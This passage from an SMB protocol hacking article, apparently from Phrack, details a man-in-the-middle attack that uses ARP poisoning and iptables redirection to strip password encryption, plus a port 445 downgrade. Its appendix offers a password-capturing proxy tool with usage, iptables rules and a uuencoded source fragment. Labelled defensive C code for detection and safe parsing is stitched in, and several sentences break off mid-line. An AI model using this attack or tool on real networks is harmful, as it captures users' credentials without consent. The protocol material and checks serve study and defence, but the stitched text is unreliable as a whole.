When the attacker has the password, he encrypts it with the encryption
key recovered before and sends the sesssetupx request (with 
the encrypted password) to the server.

The server sends a sesssetupx reply to accept or refuse the session.
The attacker redirects the sesssetupx reply and the whole traffic 

The session will not fail and nobody has seen our man in the middle !

Description :

           ARP-P                  ARP-P
[client] <---------  [attacker]  ---------> [server]

The attacker carries out an ARP poisoning attack to redirect the whole
traffic between the two machines.

[client] <---------> [attacker] <---------> [server]

The traffic redirection is operated with NAT and iptables.

            port 139
[client] -----------------> [attacker]        [server]

The attacker receives the first packet to the SMB server port.

[client]  ----------------->[attacker 139]        [server]
                            [attacker 1139]

The attacker redirects it to the port 1139.
On the port 1139, our proxy program is listening. 

          negprot request
[client] -----------------> [attacker]        [server]

The attacker receives the negprot request.

                                     negprot request
[client]                   [attacker]---------------> [server]

The attacker redirects directly the negprot request to the server.

                                     negprot reply
[client]         [attacker] <----------------------------    [server]
                                 (encryption bit set
                              to have password encrypted)

The server replies with a negprot reply with the encryption 
bit set to have the password encrypted. The attacker doesn't
redirect this packet. He changes the encryption bit to have
a plain text password.

                  negprot reply
[client] <----------------------------- [attacker]        [server]
               (encryption bit set
           to have plain text password )

The attacker sends the modified negprot reply with the encryption 
bit changed to have the password in clear text. 

            sesssetupX request
[client] ------------------------> [attacker]        [server]
         (password in clear text)

The client sends the password in clear text, the attacker recovers 

                                     sesssetupX request
[client]                [attacker] --------------------->  [server]
                                    (password encrypted)

The attacker sends a sesssetupx request to the server with the 
encrypted password.

                                    sesssetupX reply
[client] <------------- [attacker] <----------------  [server]   

The server sends the sesssetupx reply. The attacker redirects it.

[client] <------------> [attacker] <--------------> [server]

The attacker continues to redirect traffic between the two machines 
until the end of the SMB session.

The implementation of the man in the middle attack is given in the
Appendix A (the NAT and iptables rules are given also).

Take a look at the source code, you will learn a lot of
details !.
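
A monitoring-side check for the tampering described in 6.5 and 6.6, using
the negprot reply layout from 6.4: it parses the reply with bounds checks
and flags a cleared encryption bit or a zero-length encryption key. This is
an added example, not the article's Appendix A code; the function and macro
names are chosen here, the sample replies are constructed, and the check
assumes the server is known to require encrypted passwords.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SMB_HDR_LEN       32    /* SMB base header, see 6.3 */
#define NEGPROT_FIXED     37    /* WordCount + 17 words + ByteCount */
#define SMB_COM_NEGPROT   0x72
#define SEC_ENCRYPT_PW    0x02  /* SecurityMode bit 1 */
#define FINDING_PLAINTEXT 0x1   /* reply asks for an unencrypted password */
#define FINDING_NO_KEY    0x2   /* EncryptionKeyLength is zero */

struct negprot_reply {
    uint8_t  security_mode;
    uint8_t  key_len;           /* EncryptionKeyLength */
    uint16_t byte_count;
    const uint8_t *key;         /* points into the caller's buffer */
    const uint8_t *domain;      /* OemDomainName */
    size_t   domain_len;        /* ByteCount - EncryptionKeyLength */
};

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Parse one SMB message (NETBIOS header already removed). Returns 0 on
 * success, -1 if it is not a well-formed 17-word negprot reply. */
int parse_negprot_reply(const uint8_t *msg, size_t len, struct negprot_reply *r)
{
    const uint8_t *w;           /* command part, starting at WordCount */

    if (len < SMB_HDR_LEN + NEGPROT_FIXED)
        return -1;
    if (memcmp(msg, "\xffSMB", 4) != 0 || msg[4] != SMB_COM_NEGPROT)
        return -1;
    w = msg + SMB_HDR_LEN;
    if (w[0] != 17)
        return -1;
    r->security_mode = w[3];
    r->key_len       = w[34];
    r->byte_count    = le16(w + 35);
    /* Both lengths come off the wire: check them against the bytes held. */
    if ((size_t)r->byte_count > len - SMB_HDR_LEN - NEGPROT_FIXED ||
        r->key_len > r->byte_count)
        return -1;
    r->key        = w + NEGPROT_FIXED;
    r->domain     = r->key + r->key_len;
    r->domain_len = (size_t)(r->byte_count - r->key_len);
    return 0;
}

/* Findings for a server known to require encrypted passwords: either flag
 * means the reply is not the one that server would send. */
unsigned negprot_findings(const struct negprot_reply *r)
{
    unsigned f = 0;
    if (!(r->security_mode & SEC_ENCRYPT_PW))
        f |= FINDING_PLAINTEXT;
    if (r->key_len == 0)
        f |= FINDING_NO_KEY;
    return f;
}

/* Constructed test input: a negprot reply with the given SecurityMode,
 * key and domain. buf must hold 69 + key_len + strlen(domain) + 1 bytes. */
size_t make_test_reply(uint8_t *buf, uint8_t mode, const uint8_t *key,
                       uint8_t key_len, const char *domain)
{
    size_t dlen = strlen(domain) + 1;       /* OEM string with its NUL */
    size_t bytes = key_len + dlen;
    uint8_t *w = buf + SMB_HDR_LEN;

    memset(buf, 0, SMB_HDR_LEN + NEGPROT_FIXED);
    memcpy(buf, "\xffSMB", 4);
    buf[4] = SMB_COM_NEGPROT;
    w[0]  = 17;
    w[3]  = mode;
    w[34] = key_len;
    w[35] = (uint8_t)bytes;
    w[36] = (uint8_t)(bytes >> 8);
    if (key_len)
        memcpy(w + NEGPROT_FIXED, key, key_len);
    memcpy(w + NEGPROT_FIXED + key_len, domain, dlen);
    return SMB_HDR_LEN + NEGPROT_FIXED + bytes;
}

int main(void)
{
    static const uint8_t key[8] = { 1, 2, 3, 4, 5, 6, 7, 8 };
    uint8_t buf[128];
    struct negprot_reply r;
    size_t n;
    n = make_test_reply(buf, 0x03, key, 8, "WORKGROUP");
    if (parse_negprot_reply(buf, n, &r) == 0)
        printf("encrypting reply: findings=%u\n", negprot_findings(&r));
    n = make_test_reply(buf, 0x01, NULL, 0, "WORKGROUP");
    if (parse_negprot_reply(buf, n, &r) == 0)
        printf("plaintext reply:  findings=%u\n", negprot_findings(&r));
    return 0;
}
```

Run against replies captured on the client side of the link, a nonzero result for a server that normally sends an 8-byte key is the signal to investigate.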

----[ 6.7 - Notes about windows 2k/XP SMB operating over TCP/IP 

As I wrote before, on Windows 2k/XP, SMB can run directly over TCP.
The SMB server is listening for incoming connections on port 445.
But it's not so "directly". In fact instead of having a NETBIOS header
which is 4 bytes long, we have another header which is 4 bytes long too.

Description :

        |      TCP      |
        |  SMB BASE HDR |

This special header is defined like this :

                UCHAR Zero;      // Set to zero
                UCHAR Length[3]; // Count of data bytes (the 4 bytes of
                                 // the header are not included)

This special header is not very different from the NETBIOS header. You 
will understand why.

This is the NETBIOS header :

                UCHAR Type;     // Type of the packet
                UCHAR Flags;    // Flags
                USHORT Length;  // Count of data bytes (netbios header
                                // not included)

When SMB is running over TCP, the NETBIOS session request should 
not be used.

In fact, the NETBIOS names of the client and of the server should not 
be sent. So the value of the "Type" field in the NETBIOS is always 
equal to zero (the "Type" field is different from zero when the client
sends his encoded NETBIOS name - Type = 0x81 - and when it receives 
the reply - Type = 0x82 -). Remember, during the SMB session the
Type field is equal to zero ( it's the "Type" code for the NETBIOS 
session message).

For the first byte nothing is different.

For the last three bytes now :

The "Flags" field of the NETBIOS header is always set to zero.
The length of the packet only takes the two last bytes of the special

The three last bytes are the same.

To conclude there is no difference between the NETBIOS and the special
header when NETBIOS is not used.

Downgrade attack :

If the client (running on Windows XP or 2k) has NBT enabled, it always
tries to connect to ports 139 and 445 simultaneously. If the client 
gets a response from port 445, it will send a RST packet 
to port 139. If the client gets no response from port 445, it 
will try to connect on port 139. If it gets no response from either, 
the session will fail.
If the client has NBT disabled, the client will try on the port 445 

To perform a downgrade attack, i.e. to force the client not to use port 
445 and to use port 139 instead, you have to make the client believe 
that port 445 is closed. With the transparent proxy attack it's very 
easy: with iptables you just have to redirect the incoming traffic
on the attacker's machine on port 445 to a closed port. With this
the client will use port 139 (the iptables rule for this is
given in appendix A).
This will work if NBT is enabled.

If the client has NBT disabled, the transparent proxy will handle the 
SMB traffic on port 445. You've got an option on the program for this.

Ok, we have finished with the attack for recovering passwords.
We will now study another important part of SMB.

--[ 7 - Transaction subprotocol and RAP commands

I will explain in this chapter a set of special (and obscure) 
SMB commands : the RAP commands.
These commands use the transaction subprotocol. 
I will also describe this subprotocol.

----[ 7.1 - The transaction subprotocol

When a large amount of data is sent during a SMB session or if there is
a specific operation requested, the SMB protocol includes a transaction 

The transaction subprotocol is mainly used for SMB Remote Procedure 
Calls : The RAP commands (RAP for Remote Administration Protocol). 
But I will explain it later. 

The transaction subprotocol is not a derived protocol of SMB. The 
transaction subprotocol is just another command for SMB. So the
transaction subprotocol is layered on the SMB base header and the command 
code for the transaction subprotocol is 0x25.

Like the other commands there is a request and a reply.

This is the Transaction request header :
 UCHAR WordCount;                 Count of parameter words;   value =
                                  (14 + value of the "SetupCount" field)
 USHORT TotalParameterCount;      Total parameter bytes being sent
 USHORT TotalDataCount;           Total data bytes being sent
 USHORT MaxParameterCount;        Max parameter bytes to return
 USHORT MaxDataCount;             Max data bytes to return
 UCHAR MaxSetupCount;             Max setup words to return
 UCHAR Reserved;
 USHORT Flags;                    Additional information:
                                  bit 0 - also disconnect TID in TID
                                  bit 1 - one-way transaction (no
 ULONG Timeout;
 USHORT Reserved2;
 USHORT ParameterCount;           Parameter bytes sent this buffer
 USHORT ParameterOffset;          Offset (from header start) to
 USHORT DataCount;                Data bytes sent this buffer
 USHORT DataOffset;               Offset (from header start) to data
 UCHAR SetupCount;                Count of setup words
 UCHAR Reserved3;                 Reserved (pad above to word)
 USHORT Setup[SetupCount];        Setup words (# = SetupWordCount)
 USHORT ByteCount;                Count of data bytes
 STRING Name[];                   Name of transaction (NULL if
 UCHAR Pad[];                     Pad to SHORT or LONG
 UCHAR Parameters[ ParameterCount ]; Parameter bytes (# = ParameterCount)
 UCHAR Pad1[];                    Pad to SHORT or LONG
 UCHAR Data[ DataCount ];         Data bytes (# = DataCount)

In the majority of cases, a RAP command sent with the Transaction subprotocol 
may need several Transaction packets for sending the parameters 
and data bytes. The parameter bytes are usually sent first, followed 
by the data bytes. If several transaction packets are involved, 
the server sends this small packet as an acknowledgement between each 
transaction packet :

Interim Reply packets :

 UCHAR WordCount;                 Count of parameter words = 0
 USHORT ByteCount;                Count of data bytes = 0

For the transaction request header, the "TotalParameterCount" field 
represents the count of parameter bytes to be sent and it's the same 
for the "TotalDataCount" field (count of data bytes to be sent). 
The offsets from the start of the SMB base header to the parameter 
bytes and the data bytes are given by the "ParameterOffset" and 
"DataOffset" fields. 

The parameter bytes are in the "Parameters" field.
The data bytes are in the "Data" field.

You must understand that these "Parameters" and "Data" fields are used 
for the RAP command. "Parameters" contains the parameter bytes for 
the RAP command and "Data", the data bytes.

The "DataCount" and "ParameterCount" fields represent respectively 
the count of data bytes and the count of parameter bytes present in 
the transaction packet being considered. If these fields are equal to 
"TotalDataCount" and "TotalParameterCount", it means that 
all parameter and data bytes fit in a single packet. If they are not, 
it means that the server (for a request) or the client (for a reply) 
must wait for further packets. When all packets are received, the 
parameter and data bytes are marshalled for analysis.

Take a look at the field "WordCount", it contains the value : 
14 + "SetupCount" field; in the majority of cases SetupCount is equal to 0.

The Transaction reply header: 

There is not a big difference between the reply and the request

 UCHAR WordCount;                 Count of data bytes; value = 10 +
                                  "Setupcount" field.
 USHORT TotalParameterCount;      Total parameter bytes being sent
 USHORT TotalDataCount;           Total data bytes being sent
 USHORT Reserved;
 USHORT ParameterCount;           Parameter bytes sent this buffer
 USHORT ParameterOffset;          Offset (from header start) to
 USHORT ParameterDisplacement;    Displacement of these Parameter
 USHORT DataCount;                Data bytes sent this buffer
 USHORT DataOffset;               Offset (from header start) to data
 USHORT DataDisplacement;         Displacement of these data bytes
 UCHAR SetupCount;                Count of setup words
 UCHAR Reserved2;                 Reserved (pad above to word)
 USHORT Setup[SetupWordCount];    Setup words (# = SetupWordCount)
 USHORT ByteCount;                Count of data bytes
 UCHAR Pad[];                     Pad to SHORT or LONG
 UCHAR Parameters[ParameterCount]; Parameter bytes (# = ParameterCount)
 UCHAR Pad1[];                    Pad to SHORT or LONG
 UCHAR Data[DataCount];           Data bytes (# = DataCount)

The client must use the "ParameterOffset" and "DataOffset" to know the 
offset (from the beginning of the SMB base header) of data and 
parameters bytes.
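
The reassembly rule above, written the way a receiver has to implement it
against an untrusted peer: every count, offset and displacement is checked
before any byte is copied. This is an added example, not code from the
article; the names are chosen here and the packets are constructed. As a
simplification it accepts packets only in order and expects the totals to
stay the same from one packet to the next.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SMB_HDR_LEN         32      /* SMB base header, see 6.3 */
#define SMB_COM_TRANSACTION 0x25
#define TRANS_FIXED         21      /* WordCount through Reserved2 */
#define TRANS_MAX           65535   /* the counts are 16-bit */

struct trans_reasm {
    int     started;
    size_t  param_total, param_seen, data_total, data_seen;
    uint8_t param[TRANS_MAX], data[TRANS_MAX];
};

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void put16(uint8_t *p, unsigned v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Copy one section (parameters or data) of a packet into place. Count,
 * offset and displacement all come from the peer, so each is checked. */
static int place(uint8_t *dst, size_t total, size_t *seen, const uint8_t *msg,
                 size_t len, size_t count, size_t offset, size_t disp)
{
    if (count == 0)
        return 0;
    if (offset < SMB_HDR_LEN + TRANS_FIXED || offset > len || count > len - offset)
        return -1;                  /* section lies outside this packet */
    if (disp != *seen || count > total - disp)
        return -1;                  /* gap, overlap or more than announced */
    memcpy(dst + disp, msg + offset, count);
    *seen += count;
    return 0;
}

/* Feed one Transaction reply (NETBIOS header removed). Returns 1 when all
 * parameter and data bytes have arrived, 0 if more packets are expected,
 * -1 if the packet is malformed or disagrees with earlier ones. */
int trans_feed(struct trans_reasm *st, const uint8_t *msg, size_t len)
{
    const uint8_t *w;
    size_t tp, td;

    if (len < SMB_HDR_LEN + TRANS_FIXED || memcmp(msg, "\xffSMB", 4) != 0 ||
        msg[4] != SMB_COM_TRANSACTION)
        return -1;
    w = msg + SMB_HDR_LEN;
    if (w[0] < 10)                  /* WordCount = 10 + SetupCount */
        return -1;
    tp = le16(w + 1);
    td = le16(w + 3);
    if (st->started && (tp != st->param_total || td != st->data_total))
        return -1;
    st->started = 1;
    st->param_total = tp;
    st->data_total = td;
    if (place(st->param, tp, &st->param_seen, msg, len,
              le16(w + 7), le16(w + 9), le16(w + 11)) < 0 ||
        place(st->data, td, &st->data_seen, msg, len,
              le16(w + 13), le16(w + 15), le16(w + 17)) < 0)
        return -1;
    return st->param_seen == tp && st->data_seen == td;
}

/* Constructed test input: a reply packet with SetupCount = 0 carrying pc
 * parameter bytes at displacement pd and dc data bytes at displacement dd.
 * buf must hold 55 + pc + dc bytes. */
size_t make_fragment(uint8_t *buf, unsigned tp, unsigned td,
                     const void *p, unsigned pc, unsigned pd,
                     const void *d, unsigned dc, unsigned dd)
{
    uint8_t *w = buf + SMB_HDR_LEN;
    unsigned poff = SMB_HDR_LEN + TRANS_FIXED + 2;  /* just after ByteCount */
    unsigned doff = poff + pc;

    memset(buf, 0, poff);
    memcpy(buf, "\xffSMB", 4);
    buf[4] = SMB_COM_TRANSACTION;
    w[0] = 10;
    put16(w + 1, tp);   put16(w + 3, td);
    put16(w + 7, pc);   put16(w + 9, poff);   put16(w + 11, pd);
    put16(w + 13, dc);  put16(w + 15, doff);  put16(w + 17, dd);
    put16(w + 21, pc + dc);
    if (pc) memcpy(buf + poff, p, pc);
    if (dc) memcpy(buf + doff, d, dc);
    return (size_t)doff + dc;
}

int main(void)
{
    static struct trans_reasm st;   /* zero-initialised; large, so not on the stack */
    uint8_t pkt[128];
    size_t n;

    n = make_fragment(pkt, 8, 6, "\0\0\0\0\1\0\1\0", 8, 0, "ABC", 3, 0);
    printf("packet 1 -> %d\n", trans_feed(&st, pkt, n));
    n = make_fragment(pkt, 8, 6, NULL, 0, 0, "DEF", 3, 3);
    printf("packet 2 -> %d\n", trans_feed(&st, pkt, n));
    return 0;
}
```

After a -1 the state may hold a partial copy, so the caller should discard it rather than feed further packets.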

----[ 7.2 - RAP commands     

RAP (Remote Administration Protocol) is the SMB implementation of 

RAP request : 

       |TCP HDR                    |
       |NETBIOS HDR                |
       |SMB BASE HDR               |
       |RAP REQUEST DATAS          | 
RAP Reply :

       |TCP HDR                    |
       |NETBIOS HDR                |
       |SMB BASE HDR               |
       |RAP REPLY PARAMETERS       |
       |RAP REPLY DATAS            |

 When you use a RAP command you always find the string "\PIPE\LANMAN" 
 in the "Name" field in the transaction (request and reply) header.

 These are several examples of RAP commands : 

 -NETSHAREENUM : Retrieve information about each shared resource 
                 on a server

 -NETSERVERENUM2 : List all the computers of specified types in a 
                   specified domain

 -NETSERVERGETINFO : Get information about a specified server

 -NETSHAREGETINFO : Retrieve information about a particular shared 

 -NETWKSTAUSERLOGON : Executed on a SMB server to log a user on.
 -NETWKSTAUSERLOGOFF : The same but for logging off.

 -NETUSERGETINFO : Obtain information about a particular user.

 -NETWKSTAGETINFO : Obtain information about a particular station.

 -SAMOEMCHANGEPASSWORD : For changing the password of a specified user on 
                         a remote SMB server.

I'm not going to describe all of these commands, I will just take one as an 
example (to have a listing of the shared resources available on a server).

If you want to know more about RAP commands read [2].

--[ 8 - Using RAP commands to list available shares on a server

 This part is a complement to the previous chapter. I will explain 
how the RAP commands work by giving an example.

The program given in Appendix B is the implementation of what is 
explained in this chapter. It does the same thing as the commands 
"net view \\ServerIP" (for DOS) or "smbclient -L ServerIP -N " 
(on Linux).  But this program allows you to specify the NETBIOS 
name, it is a bit anonymous. If you read this source you will 
learn a lot of things about SMB network programming.

How I can retrieve SMB everyone shares on a network :

The process is easy to understand. The client must be authenticated 
on the server. The client identifies itself with the process developed 
in chapter 3 (with no password). When the server has checked the 
identity of the client, the client sends a Tconx request (after the 
Sessetupx reply).

Tconx means "Tree CONnect and X".

The TconX request packet is used to access a shared resource.

----[ 8.1 - Tconx Packets 

 Request header
 The TconX packets are layered on the SMB Base Header ("Command" = 0x75).

UCHAR WordCount;                   Count of parameter words = 4
UCHAR AndXCommand;                 Secondary (X) command; 0xFF = none
UCHAR AndXReserved;                Reserved (must be 0)
USHORT AndXOffset;                 Offset to next command WordCount
USHORT Flags;                      Additional information
USHORT PasswordLength;             Length of Password[]
USHORT ByteCount;                  Count of data bytes;    min = 3
UCHAR Password[];                  Password
STRING Path[];                     Server name and share name
STRING Service[];                  Service name

The password was sent during the session establishment. 
The Password length is set to 1 and the Password 
string contains a null value (0x00).

The string "Path" contains the name of the resource that the client wishes 
to connect to. It uses the unicode style syntax. For example I want to connect 
to a share called "myshare" on a server called "myserver". The 
Path string will contain "\\myserver\myshare". 

The "Service" string contains the type of resource requested :

        string          Type of resource
        "A:"            disk share.
        "LPT1:"         printer.
        "IPC"           named pipe.
        "COMM"          communications device.
        "?????"         any type of device.

For scanning any type of device you must use the "?????" string in the 
"Service" field.

After you send your Tconx request to the server, the server replies with 
a TconX reply. You must recover the "Tid" field (in the SMB Base header) 
which is the Transaction request with the RAP command. 
You must specify to the server that you want to know which resources 
are available. For this, you must use the RAP command : NETSHAREENUM.

----[ 8.2 - Explanation of the RAP command "NetShareEnum" :

The RAP command that we will study is NetShareEnum.

The RAP Command "NetshareEnum" request  :

The field "Parameters" of the transaction request header receives :

  The 16 bit code of function NetShareEnum : 0;
  The parameter descriptor string : "WrLeh" 
  Data descriptor string for returned data : "B13BWZ"
  A 16 bit integer with a value of 0x01;
  A 16 bit integer that contains the size of the receive buffer.

It would take too long to explain how parameter and data descriptor strings 
work. These strings are used to know the size and the format of 
parameters and data. One parameter and one data descriptor string 
is defined for each RAP command.

If you want to know more about these strings, read [2].

No data are needed for this request so the "DataCount" and 
"TotalDataCount" fields are equal to zero. 

  |             NETBIOS HDR                    |---------> 4 bytes
  |             SMB BASE HDR   	               |---------> 32 Bytes
  |        SMB TRANSACTION REQUEST HDR         |

The Transaction request "Parameters" field receives the parameters 
for the RAP request : 

  |      0x0000  | ----------------------------------------> A
  |   W       r  |  L        e  |  h       0x00|-----------> B
  |   B       1  |  3        B  |  W         Z |  0x00 |---> C
  |     0x0001   |     0xffff   |--------------------------> D
  A : The NetShareEnum function code : 0x00
  B : The parameter descriptor string
  C : The data descriptor string
  D : 0x01 (defined value) and 0xffff (Max size of the received buffer) 

And the server replies :

The "Parameters" field of the transaction reply header receives :

 A 16 bit integer word that contains the return status code :

 Success 0
 Access Denied 5
 Network Access Denied 65
 More data 234
 Server not started 2114
 Transaction configuration bad 2141

 A 16 bit "converted word", used to calculate an offset to remark 
 A 16 bit word that contains the number of entries returned = number of 
 SHARE_INFO structures (see below).
 A 16 bit word representing the number of available entries.

 The field "Data" of the transaction reply header contains the several
SHARE_INFO structures.

 The SHARE_INFO structure contains the information about each shared
resource available and it is defined like this :
  struct SHARE_INFO {
    char shi1_netname[13]; /*Name of the resource*/
    char shi1_pad; /*Pad to a word*/
    unsigned short shi1_type; 

       /*Code specifies the type of the shared resource :
          0 Disk Directory tree
          1 Printer queue 
          2 Communications device 
          3 IPC*/

    char *shi1_remark; /*Remark on the specified resource*/
  };

 shi1_remark is a 32 bit pointer to a string. This string contains a
 remark about a shared resource. You must subtract the "converter word"
 from the 16 lower bits of "shi1_remark" to know the offset
 between this string and the beginning of the RAP reply parameters.

 As an ASCII diagram :
  |             NETBIOS HDR                    |------------> 4 bytes
  |             SMB BASE HDR   	               |------------> 32 Bytes
  |             SMB TRANS REPLY HDR            |
Description of the "Parameters" section of the Transaction reply packet 
(corresponding to the parameters of the NetShareEnum reply) :
  |           status code                      |-------------> 2 bytes
  |           converted word                   |-------------> 2 bytes
  |           number of entries returned       |-------------> 2 bytes
  |           number of entries available      |-------------> 2 bytes
Data section of the Transaction reply (corresponding to the
several SHARE_INFO structures if there is more than one resource
available) :
  |         shi1_netname                       |-----------> 13 bytes
  |         shi1_pad to pad to word            |-----------> 1 byte  
  | type of service                            |-----------> 2 bytes
  | pointer to remark string                   |-----------> 4 bytes
          Other SHARE_INFO structures
  |               remark string 1              |
  |           other remark strings             |
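
The reply layout described above, decoded with bounds checks, as an added example that is not code from the original article. It assumes the remark offset is counted from the start of the data section (where the diagram above places the remark strings) and that a zero pointer means no remark; `share_entry`, `parse_netshareenum_reply`, `run_demo` and the sample bytes are constructed for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RAP_PARAMS_SIZE 8    /* status, converted word, returned, available */
#define SHARE_INFO_SIZE 20   /* 13 + 1 + 2 + 4 bytes on the wire */

struct share_entry {         /* decoded entry (hypothetical name) */
    char        name[14];    /* shi1_netname plus a forced terminator */
    uint16_t    type;        /* shi1_type: 0 disk, 1 printer, 2 device, 3 IPC */
    const char *remark;      /* points into the data section, or "" */
};

static uint16_t rd16(const uint8_t *p)   /* SMB words are little-endian */
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Returns the number of entries decoded, 0 if the status code reports an
 * error, -1 if the reply is malformed. Counts and offsets are chosen by the
 * server, so each is checked against the buffer sizes before it is used. */
int parse_netshareenum_reply(const uint8_t *params, size_t params_len,
                             const uint8_t *data, size_t data_len,
                             uint16_t *status,
                             struct share_entry *out, size_t out_max)
{
    if (params_len < RAP_PARAMS_SIZE)
        return -1;
    *status = rd16(params);
    uint16_t converter = rd16(params + 2);
    size_t   returned  = rd16(params + 4);  /* params + 6: entries available */

    if (*status != 0 && *status != 234)     /* 0 success, 234 more data */
        return 0;
    if (returned > out_max || returned * SHARE_INFO_SIZE > data_len)
        return -1;

    for (size_t i = 0; i < returned; i++) {
        const uint8_t *e = data + i * SHARE_INFO_SIZE;
        if (memchr(e, '\0', 13) == NULL)    /* name must end inside its field */
            return -1;
        memcpy(out[i].name, e, 13);
        out[i].name[13] = '\0';
        out[i].type = rd16(e + 14);

        uint16_t low = rd16(e + 16);        /* 16 lower bits of shi1_remark */
        out[i].remark = "";
        if (low == 0)                       /* assumption: no remark present */
            continue;
        if (low < converter)
            return -1;
        size_t off = (size_t)(low - converter);
        if (off >= data_len || memchr(data + off, '\0', data_len - off) == NULL)
            return -1;                      /* outside the data or unterminated */
        out[i].remark = (const char *)(data + off);
    }
    return (int)returned;
}

/* Constructed sample reply (not a capture): two shares, converted word 0x1000. */
static const uint8_t sample_params[RAP_PARAMS_SIZE] = {
    0x00, 0x00,  0x00, 0x10,   /* status 0, converted word 0x1000 */
    0x02, 0x00,  0x02, 0x00    /* 2 entries returned, 2 available */
};
static uint8_t sample_data[65];
struct share_entry demo_shares[4];
uint16_t demo_status;

static void put_entry(uint8_t *e, const char *name, uint16_t type, uint16_t low)
{
    memset(e, 0, SHARE_INFO_SIZE);
    memcpy(e, name, strlen(name));
    e[14] = (uint8_t)type;  e[15] = (uint8_t)(type >> 8);
    e[16] = (uint8_t)low;   e[17] = (uint8_t)(low >> 8);
    e[18] = 0xef;           e[19] = 0xbe;   /* upper half, not used */
}

/* Parses the sample with the last `cut` bytes of the data section missing. */
int run_demo(size_t cut)
{
    put_entry(sample_data,      "PUBLIC", 0, 0x1000 + 40);
    put_entry(sample_data + 20, "IPC$",   3, 0x1000 + 53);
    memcpy(sample_data + 40, "Public files", 13);   /* offsets 40..52 */
    memcpy(sample_data + 53, "IPC Service", 12);    /* offsets 53..64 */
    return parse_netshareenum_reply(sample_params, sizeof sample_params,
                                    sample_data, sizeof sample_data - cut,
                                    &demo_status, demo_shares, 4);
}

int main(void)
{
    int n = run_demo(0);
    for (int i = 0; i < n; i++)
        printf("%-13s type=%u remark=\"%s\"\n", demo_shares[i].name,
               (unsigned)demo_shares[i].type, demo_shares[i].remark);
    printf("truncated reply -> %d\n", run_demo(1));
    return 0;
}
```

A reply whose entry count or remark pointer does not fit the received data is rejected instead of being read past the end of the buffer.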

--[ 9 - Conclusion :

 I hope you have learned a lot of things in this article.
 If you have any comments or questions, send them to :
                   <[email protected]>

--[ 10 - References

[1] "A common Internet File System (CIFS/1.0) Protocol
    Preliminary Draft", Paul J.Leach and Dilip C. Naik

[2] "CIFS Remote Administration Protocol Preliminary Draft"
    Paul J.Leach and Dilip C. Naik

[3] RFC 1001

[4] RFC 1002

--[ 11 - Thanks

Just a Merry Christmas to TearDrop, Frealek and "el Tonio".

A big thanks to TearDrop for all. Without him, nothing would
be possible !

Take a look at <>, you will find a very good
(and free) scanner !

Thanks to Mr D. (my network administrator !), for all the advice
and the several Linux distribs.

Thanks to the Chemical brothers for the inspirational music.

Thanks to the phrack staff, for all their remarks and particularly
about the transparent proxy attack.

To you for reading this article ;).

--[  Appendix A

This program lets you obtain passwords in clear directly from
the network when they should be encrypted. It works with libnet
(v 1.1 !) and libpcap.
This is the implementation of the Transparent proxy attack of
chapter 6.6.

libnet :

libpcap :

You must be root to compile and to execute this program !

If you want to compile it, you could use : 
       "gcc SMBproxy.c -o SMBproxy -lnet -lpcap"

If you want to use it :
       "SMBproxy -i interface
                 -c Client's IP address
                 -s Server's IP address
                 -f your fake IP (what you want : for example)
                 -l listening port (1139 by default)"

Be careful, the program will ask you about support for the Windows 2k/XP
specifications. You must answer "y" when NBT is disabled, not when it is
enabled, on Windows 2k/XP !

You give the IP address of a client and of the server; this program
waits for a connection from the client to an SMB server, launches the
attack, recovers the password and redirects the traffic.

The fake IP parameter corresponds to your fake IP, give what you want !
The attacker's machine should have no active connections with the server
or with the client (like FTP or telnet ...).
The default listening port is 1139.

This program gives the password and the user name (if necessary). It 
also gives the security level (share or user). If the connection has 
succeeded, it gives the name of the share and a message like "password 
valid". If it has failed, it gives nothing (just the password and the
user name).

This program should be compiled on Linux for some technical reasons,
like the network byte ordering. You shouldn't use it on the loopback

Support Windows 2k/XP specifications.

This is the iptables/NAT command to execute on the attacker's machine

To redirect incoming traffic to port 139 on port 1139

#iptables -t nat -A PREROUTING -i eth0 -p tcp -s \
--dport 139 -j REDIRECT --to-port 1139 is the IP address of the client. 

To redirect the whole traffic

#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

To redirect incoming traffic to port 445 on port 1139

(for Windows 2k/XP client with NBT disabled)

#iptables -t nat -A PREROUTING -i eth0 -p tcp -s \
--dport 445 -j REDIRECT --to-port 1139 is the IP address of the client. 

If you want to perform the downgrade attack of chapter 6.8, replace
port 1139 with a closed port.

Be careful, for the traffic redirection, this line must be present in the
/etc/sysconfig/network :


This program doesn't support UNICODE strings.

Successfully tested with Samba server 2.0.

M-#@I.R`-"@E]#0H-"@EP97)M=71E*'!D,[email protected]:6XL('!E<FTS+"`V-"D[#0H-
M"@EF;W(@*&H],#MJ/#,R.VHK*[email protected]>PT*"0EL6VI=(#[email protected]<&0Q6VI=.PT*"0ER
M6VI=(#[email protected]<&0Q6VHK,S)=.PT*"7T-"@T*"69O<B`H:3TP.VD\,38[:2LK*2![
M<B!R,ELS,ET[#0H-"@D)<&5R;75T92AE<[email protected]<[email protected]<&5R;30L(#0X*3L-"@T*
M"0EX;W(H97)K+"!E<[email protected]:VE;9F]R=R`_(&[email protected]`Q-2`M(&E=+"`T."D[#0H-
M"0D)8EMJ75MK72`](&5R:UMJ*[email protected]*R!K73L-"@T*"0EF;W(@*&H],#MJ/#@[
M:BLK*2![#0H)"0EI;[email protected];[email protected];CL-"@D)"[email protected]/2`H8EMJ75LP73P\,[email protected]?"!B
M6VI=6S5=.PT*#0H)"0EN(#[email protected]*&);:EU;,5T\/#,I('[email protected]*&);:EU;,ET\/#(I
M('[email protected]#0H)"0D)*&);:EU;,UT\/#$I('[email protected]@#0H-"@D)"69O<B`H
M:STP.VL\-#MK*RLI(`T*"0D)"6);:EU;:[email protected]/2`H<V)O>%MJ75MM75MN72`F
M72`](&);:EU;:UT[#0H)"7!E<FUU=&4H<&-B+"[email protected]<&5R;34L(#,R*3L-
M"@T*"0EX;W(H<C(L(&PL('[email protected],S(I.PT*#0H)"69O<B`H:CTP.VH\,S([
M#0H)"0ER6VI=(#[email protected]<C);:ET[#0H)?0T*#0H)8V]N8V%T*')L+"!R+"!L+"`S
